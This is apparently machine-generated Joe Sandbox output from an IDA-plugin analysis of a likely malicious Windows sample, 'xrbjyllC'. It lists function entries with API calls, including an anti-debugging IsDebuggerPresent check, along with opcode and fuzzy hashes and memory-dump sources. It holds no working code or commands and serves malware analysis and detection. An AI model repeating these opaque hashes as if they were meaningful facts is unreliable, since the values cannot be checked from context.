• Snapshot File: hcaresult_11_2_2ab10000_xrbjyllC.jbxd
Similarity
• API ID: GlobalMemoryStatus
• String ID:
• API String ID: 1890195054-0
• Opcode ID: 7fc2d0bd080092e5bfe31aeb4470892877114663c06cfc83ca2e03a7f6d5b61a
• Instruction ID: 1ba939ad1fab856ad7c7400abc1c6c175cbd90113d8128825287c9ce43f849c3
• Opcode Fuzzy Hash: 7fc2d0bd080092e5bfe31aeb4470892877114663c06cfc83ca2e03a7f6d5b61a
• Instruction Fuzzy Hash: BA11F3B2C006599FCB10DF9AC544BDEFBF4EF48320F15816AD818A7250D778A940CFA5
APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 2AFE0FC6
Memory Dump Source
• Source File: 0000000B.00000002.2044111260.000000002AFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AFE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2afe0000_xrbjyllC.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 0a59aad8cb3a48aee0d0e5ab0dc244a32fcc39d5a498bebe1ce786c4a44174bf
• Instruction ID: 49af3958e91e4b8a4f5aab985b4ea2ebdfcd5079458d71a1e3f340f78b83e631
• Opcode Fuzzy Hash: 0a59aad8cb3a48aee0d0e5ab0dc244a32fcc39d5a498bebe1ce786c4a44174bf
• Instruction Fuzzy Hash: B31132B5C002898FCB10DFAAD544AEEFBF4EF88314F10856AD869B7610C379A545CFA1
APIs
• KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,2AFE6B35), ref: 2AFE6BBF
Memory Dump Source
• Source File: 0000000B.00000002.2044111260.000000002AFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AFE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2afe0000_xrbjyllC.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
• Opcode ID: 117070fbd09d4c9ce3a4e0572165a99fcb5fa85c0ef6b3a73f50a413e9e4e39f
• Instruction ID: 6a4e0867c7af9d62e9e946910eba720e119ccc5f68ebb66e5b406429a56b086a
• Opcode Fuzzy Hash: 117070fbd09d4c9ce3a4e0572165a99fcb5fa85c0ef6b3a73f50a413e9e4e39f
• Instruction Fuzzy Hash: 961136B1800248CFCB10DFA9D584BEEFFF4EB48324F20855AD419A7250C7786544CFA4
APIs
• KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,2AFE6B35), ref: 2AFE6BBF
Memory Dump Source
• Source File: 0000000B.00000002.2044111260.000000002AFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AFE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2afe0000_xrbjyllC.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
• Opcode ID: c7b2fedd2f96751c9424f7083968bc291f33cf87bfcbaea576eb230ac5572cea
• Instruction ID: 6def571b6d0ee47b0c2d50d4db879bc3967df30edf8f608f0262c09cbff01286
• Opcode Fuzzy Hash: c7b2fedd2f96751c9424f7083968bc291f33cf87bfcbaea576eb230ac5572cea
• Instruction Fuzzy Hash: 5C1145B5800348CFCB10DF9AD984BDEFBF4EB48320F208469D918A7210C378A940CFA9
APIs
  • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
• SysAllocString.OLEAUT32 ref: 00401898
Memory Dump Source
• Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
Yara matches
Similarity
• API ID: AllocString_malloc
• String ID:
• API String ID: 959018026-0
• Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
• Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
• Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
• Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
APIs
• HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
Memory Dump Source
• Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
Yara matches
Similarity
• API ID: CreateHeap
• String ID:
• API String ID: 10892065-0
• Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
• Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
• Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
• Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
Similarity
• API ID:
• String ID: ,r+
• API String ID: 0-3397804654
• Opcode ID: cc0a7b8fdac78d38d8857b802ee542ec2db7270f0e3042296d5acb39f245aaf1
• Instruction ID: 141535049eab6bdd1aad35eb0b5a818e3ae15cfaa2bc701695ac790236ae5764
• Opcode Fuzzy Hash: cc0a7b8fdac78d38d8857b802ee542ec2db7270f0e3042296d5acb39f245aaf1
• Instruction Fuzzy Hash: 4F615B31E007198FDF05DFA9D891ADEBBB6AF89310F044529D50AAB355DB34AA41CFA0
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2036287383.0000000024F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 24F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_24f10000_xrbjyllC.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: d8faba275d32db6a596ca26b83c2046a3e117cbf6d654ed15494648b82964516
• Instruction ID: 1c858f2d259a5047974d569fe41163068c9a7517cbd4bf5f3e5f5acb3607f3d4
• Opcode Fuzzy Hash: d8faba275d32db6a596ca26b83c2046a3e117cbf6d654ed15494648b82964516
• Instruction Fuzzy Hash: 18113AB1D002488FCB10DFAAC5457EEFBF5EF88324F208419D559A7250C778A944CFA5
Memory Dump Source
• Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5278c9f28b2a4bde86dd27962d3dac3377f4b7b85eee2fa0a00a0c45009ea041
• Instruction ID: 7a068d510a6920af7060050d0fa410f4157183d5e81ac0fffd95f4edf5b6d612
• Opcode Fuzzy Hash: 5278c9f28b2a4bde86dd27962d3dac3377f4b7b85eee2fa0a00a0c45009ea041
• Instruction Fuzzy Hash: 62617A30600B019FDB64DF39C59675AB7E6FF88240B004A2DD88AC7B55EB75EA45CBA0
Memory Dump Source
• Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cf4c176f696ade204d3c41e6ae6d159ce2d129d12496bae992a971b87c5e1347
• Instruction ID: f0d72c51c7d12622977221f0caec622a42a83c7a3397a22742332590517d600b
• Opcode Fuzzy Hash: cf4c176f696ade204d3c41e6ae6d159ce2d129d12496bae992a971b87c5e1347
• Instruction Fuzzy Hash: 67415935A005189FDF14CB99D845ADDB7F6FF88711F088065E908EB264DB35EE41CBA0
Memory Dump Source
• Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c19804a55c46c0da06a7e61cc19161188cc2fbefe230e255442ec7bafc076704
• Instruction ID: 35ad7fa67d1080bd7c767032e07c459911de09e236e9253623ee0c9aca9c0542
• Opcode Fuzzy Hash: c19804a55c46c0da06a7e61cc19161188cc2fbefe230e255442ec7bafc076704
• Instruction Fuzzy Hash: 72412330A00B018FD724CF29D19A746B7F1FF49244F000A2DE88ACBA51E775FA58CBA1
Memory Dump Source
• Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: eae518396f454631c3d97fb20be96b665445605553f36ff8ddf6333844630412
• Instruction ID: 3dbbaf61ff410c3924b715f5c16bc93870a0147692e8625f56f2e70901ec17ce
• Opcode Fuzzy Hash: eae518396f454631c3d97fb20be96b665445605553f36ff8ddf6333844630412
• Instruction Fuzzy Hash: 3B31A571E0064A9FCF54DFA8C8419EFFBB5FFA8210B144519E514B7200DB34BA46CBA0
Memory Dump Source
• Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 98c015e7667cab75fc3284311a8a2ec626a44d5a1221093ab9df811710ea9bea
• Instruction ID: e52f71be8fe31b410766b52eae6834e5b3597c1a1a04e2f10d11921d9b126243
• Opcode Fuzzy Hash: 98c015e7667cab75fc3284311a8a2ec626a44d5a1221093ab9df811710ea9bea
• Instruction Fuzzy Hash: 84217171E0064A9FCF54DFA9C8419EFFBB5FF98210B148519E519B3204D734BA56CBA0
Memory Dump Source
• Source File: 0000000B.00000002.2035844176.0000000024EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 24EAD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_24ead000_xrbjyllC.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 006f46f2a0855d2bda7e81bb7823dcc197a1b9cf0913127191876c89b76de6a7
                                                                                              • Instruction ID: 736f08338245fec4f78beced7c48c9f7a9f01d3c83a91659f869f4f0a0c3a319
                                                                                              • Opcode Fuzzy Hash: 006f46f2a0855d2bda7e81bb7823dcc197a1b9cf0913127191876c89b76de6a7
                                                                                              • Instruction Fuzzy Hash: 42210671500204DFEB06DF14D9C0F0ABFA6FBD4314F2889A9D90D0F256C736D456CAA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2035928079.0000000024EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 24EBD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_24ebd000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8d2a80b276d4e5645681bb066964dada5e64b6aa67351723d60e3f2d5ce95582
                                                                                              • Instruction ID: c1259aa0fdd400420a739cc401990bd04c20c695ac534014d2cc51cca86fe85b
                                                                                              • Opcode Fuzzy Hash: 8d2a80b276d4e5645681bb066964dada5e64b6aa67351723d60e3f2d5ce95582
                                                                                              • Instruction Fuzzy Hash: 1B210771604604DFE706DF14E9C0F1ABBA6FB84318F20C5ADD9894B256C336D847CB61
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2035928079.0000000024EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 24EBD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_24ebd000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 67babbc5dd2affe38ddd79d43857355d1bd6b107cfab806d074c3a733a6ac6f5
                                                                                              • Instruction ID: 88f881392334bb1500ba274561d6d978d78abd4815aea0244ae147e88b322603
                                                                                              • Opcode Fuzzy Hash: 67babbc5dd2affe38ddd79d43857355d1bd6b107cfab806d074c3a733a6ac6f5
                                                                                              • Instruction Fuzzy Hash: 47216B715097C49FD703CF24D994B05BF71EB46218F29C5DBD8888F2A7C23A981ACB62
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4970e293d84cf66728c44a97fe2c78ca8bed477dbbbcdd7bb86ef765b8d95a4e
                                                                                              • Instruction ID: 6fd4afc0020c9cff76f30bde8b0d1ba37475ba81c0e3a3bbd9bba4e328e3583c
                                                                                              • Opcode Fuzzy Hash: 4970e293d84cf66728c44a97fe2c78ca8bed477dbbbcdd7bb86ef765b8d95a4e
                                                                                              • Instruction Fuzzy Hash: 97115431201F00CBEB245A70D4AAB16B3A2EF94355F20497ED95E87790CA36FF42CB61
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2035844176.0000000024EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 24EAD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_24ead000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: db79b5eb69be54bde6d22b58705b80061de706f1e28455fb2d9027648eeca995
                                                                                              • Instruction ID: 8fa2addd0c19bb942c030e94e28500cefebdf7fc8067d3ed43696d1932d34a03
                                                                                              • Opcode Fuzzy Hash: db79b5eb69be54bde6d22b58705b80061de706f1e28455fb2d9027648eeca995
                                                                                              • Instruction Fuzzy Hash: 7511B176504240CFDB02CF10D9C4B0ABF72FB94318F28C5A9D9090F256C336D55ACBA2
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 578640d5a43f39f329819837971e55d4521591bc4cfa64bcce56127b39825011
                                                                                              • Instruction ID: b516fe2de3c4245ed2061db5ef8abf7cdcb37d35cf9a25e3f7fdcfdf02359d96
                                                                                              • Opcode Fuzzy Hash: 578640d5a43f39f329819837971e55d4521591bc4cfa64bcce56127b39825011
                                                                                              • Instruction Fuzzy Hash: 2B2144B6C003498FDB10CF9AC484BDEFBF4EB88320F10856AE958A7210C374A645CFA5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 846e3790020c4e2fba6478db883e661b6c0a0c0377e1c0435bb98e2ebd256676
                                                                                              • Instruction ID: 7d599c4913d66eca25f89daf479a4d505145be5776e88d778efd1798aa46d0d6
                                                                                              • Opcode Fuzzy Hash: 846e3790020c4e2fba6478db883e661b6c0a0c0377e1c0435bb98e2ebd256676
                                                                                              • Instruction Fuzzy Hash: 921104B6D003498FDB10CF9AD544ADEFBF4EB88360F10852AE959B7210C375AA45CFA5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 771f1c635235b4fe108e53d117ca3d60c037e2cf12976be268e49ed6eebfb35e
                                                                                              • Instruction ID: 1f88f98994aa988411b47a73e4def8bc0f05a80326d465650ffafbdb3518f11c
                                                                                              • Opcode Fuzzy Hash: 771f1c635235b4fe108e53d117ca3d60c037e2cf12976be268e49ed6eebfb35e
                                                                                              • Instruction Fuzzy Hash: C01140300063868FCB16EFBCC9D89447F72EF467003651BA9C2944B19ADF366529CB61
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2035844176.0000000024EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 24EAD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_24ead000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a14ff1a33dd692c36266a79772ecb11cedbdabe136fe53d21ba25d552ddca7e1
                                                                                              • Instruction ID: 682132ee20b231b5d7803d45476d8aec2c432354a029616a5d5696fad052e798
                                                                                              • Opcode Fuzzy Hash: a14ff1a33dd692c36266a79772ecb11cedbdabe136fe53d21ba25d552ddca7e1
                                                                                              • Instruction Fuzzy Hash: 4A01526100E3C05EE7034B259894B56BFB5EF53628F19C5DBD9888F193C2695849C772
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2035844176.0000000024EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 24EAD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_24ead000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e5c4b55cae09bafd23ed97655097a6f5cd525d9e52c3a03a375a7e579f9e0276
                                                                                              • Instruction ID: ec3b72ffdf7e616cb652314b15b26fa5ad24367c92a7ed1b1ff72c9d5273edee
                                                                                              • Opcode Fuzzy Hash: e5c4b55cae09bafd23ed97655097a6f5cd525d9e52c3a03a375a7e579f9e0276
                                                                                              • Instruction Fuzzy Hash: 1A01F7711083509AF3014A25D9C4F5BBFDAEF41728F08C569ED484E186CA799841C6B1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f33f64f12e878971ccdb9b28079d5a7ffbe96fcd3f10674021d82e5e2df8ea82
                                                                                              • Instruction ID: 82ed6678d9cf8f3b14530ffb66897b409eba08d2061ea1b8e585198e1c2ce030
                                                                                              • Opcode Fuzzy Hash: f33f64f12e878971ccdb9b28079d5a7ffbe96fcd3f10674021d82e5e2df8ea82
                                                                                              • Instruction Fuzzy Hash: 3CF03734304B508FCB1ADB68E445A1977E1FF8A701B0004AAE245CB7B2CB74ED96CBA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1a6ca72f40902ff27c5c150f53fb73ac2926f4b89c23276abd80970c626a7ccb
                                                                                              • Instruction ID: 57571fea523f63f94175e39f3bf29dcba9526312d06bd5069f9d487bf59304ae
                                                                                              • Opcode Fuzzy Hash: 1a6ca72f40902ff27c5c150f53fb73ac2926f4b89c23276abd80970c626a7ccb
                                                                                              • Instruction Fuzzy Hash: 9EF06731E001289FCF08EA98D8846DDBBB6EF89310F04817ADA24A7244DB306956CB61
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 13520502000860b1c91ea140bd778016c681c5f503b4364f17e80f00f3896431
                                                                                              • Instruction ID: 296b0d006a02d9f3b303e967e045a517ec2d5da3c2fafb178096b49d68fa3ae5
                                                                                              • Opcode Fuzzy Hash: 13520502000860b1c91ea140bd778016c681c5f503b4364f17e80f00f3896431
                                                                                              • Instruction Fuzzy Hash: A5F0E231505B008FDB218A78D58D9A9BBA2EF85361B1005ABD86CC3551CA25AA41C772
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5621f328fa8a4b51ed698feb5147656b574d834075e69b81986ff0a7e08054ac
                                                                                              • Instruction ID: 8442298390f57574ac5c177113d2ee9e0a8a55480c1cf7cf6620b8a928c89357
                                                                                              • Opcode Fuzzy Hash: 5621f328fa8a4b51ed698feb5147656b574d834075e69b81986ff0a7e08054ac
                                                                                              • Instruction Fuzzy Hash: 9EF05E34300A108FCB19DF28E441A5973E5FF88711B0005A9E14A8B771CB74EC81CBA4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8657c5e46e4171956d8704a547ff1e94a6400ee4edf4f3dddc789fb20b3296ad
                                                                                              • Instruction ID: d66b3d21bcf83f11f3e8dfd226dbeeb49c1aa60ef9b0f7c1bb699e3d4c541eaa
                                                                                              • Opcode Fuzzy Hash: 8657c5e46e4171956d8704a547ff1e94a6400ee4edf4f3dddc789fb20b3296ad
                                                                                              • Instruction Fuzzy Hash: 14E07D2630D5908FCB0207A67CBA0A2BF10E99108134941D7D18DCE022C9049702C320
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: aeb2a036fcae1f949c23e373284aa9c8bdfee921ab0eeb1b95ac5802fba2b92a
                                                                                              • Instruction ID: 3227b9f287a87574599fbcb30220d393c09199e869593591acb295ec2748c0db
                                                                                              • Opcode Fuzzy Hash: aeb2a036fcae1f949c23e373284aa9c8bdfee921ab0eeb1b95ac5802fba2b92a
                                                                                              • Instruction Fuzzy Hash: CBD01730404A448FC700DF78E599A917BF4AF4A204B1445E6D84D8BA27C632E9168F51
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5cda2f2bc2b29b41f67aedeb47ccf74a0af9ca8d9f54c3ebf1ccdf6da4c109b3
                                                                                              • Instruction ID: 4a6102d35412d1560889fe73b8a767837f4f7910d7242dd7f4cb685b8a1550c6
                                                                                              • Opcode Fuzzy Hash: 5cda2f2bc2b29b41f67aedeb47ccf74a0af9ca8d9f54c3ebf1ccdf6da4c109b3
                                                                                              • Instruction Fuzzy Hash: A8D0127AE44218DB8F10CF84F4418DDF331FBC4230B108166C91867204C2316A52CFA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b75ecefaf7f02dfe1615bad52081af44969930823e1e2eb3067fe3b61648ab07
                                                                                              • Instruction ID: aac240740cb4ffb5d44722e1ba6e443a261a489419f0e865d0f0904c398bb21d
                                                                                              • Opcode Fuzzy Hash: b75ecefaf7f02dfe1615bad52081af44969930823e1e2eb3067fe3b61648ab07
                                                                                              • Instruction Fuzzy Hash: 13C04C204493944ECF4267B458951807F20DE6B300B4614E6C1648B55699543599EB23
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4055f8bebb1f09e3430c6095b42012c1cc66e4952e1761faa242fe6affef8bb3
                                                                                              • Instruction ID: 3bbf454b5b9fc03ef957e261e241749e4bd707ce72a56f356b2931b7ea99cff3
                                                                                              • Opcode Fuzzy Hash: 4055f8bebb1f09e3430c6095b42012c1cc66e4952e1761faa242fe6affef8bb3
                                                                                              • Instruction Fuzzy Hash: 3DC04834260208CFC244DB68E488D60B3E9AB48A18B2180E9E90D8B723CB32F8128A50
                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                              • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 2579439406-0
                                                                                              • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                              • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                              • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                              • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                              APIs
                                                                                              • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                              • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,00000000), ref: 004170C5
